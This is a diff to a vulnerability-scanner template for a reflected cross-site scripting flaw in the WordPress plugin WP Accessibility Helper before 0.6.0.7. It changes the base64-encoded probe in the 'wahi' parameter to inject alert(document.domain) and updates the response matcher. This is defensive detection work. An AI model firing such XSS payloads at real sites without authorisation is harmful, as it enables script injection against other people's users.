--- a/vulnerabilities/wordpress/accessibility-helper-xss.yaml
+++ b/vulnerabilities/wordpress/accessibility-helper-xss.yaml
@@ -1,4 +1,4 @@
-id: wp-accessibility-helper-xss
+id: accessibility-helper-xss
 
 info:
   name: WP Accessibility Helper (WAH) < 0.6.0.7 - Reflected Cross-Site Scripting (XSS)
@@ -11,14 +11,14 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/?wahi=JzthbGVydCgxKTsvLw=='
+      - '{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v'
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - ";alert(1);//"
+          - "var wah_target_src = '';alert(document.domain);//';"
 
       - type: word
         part: header
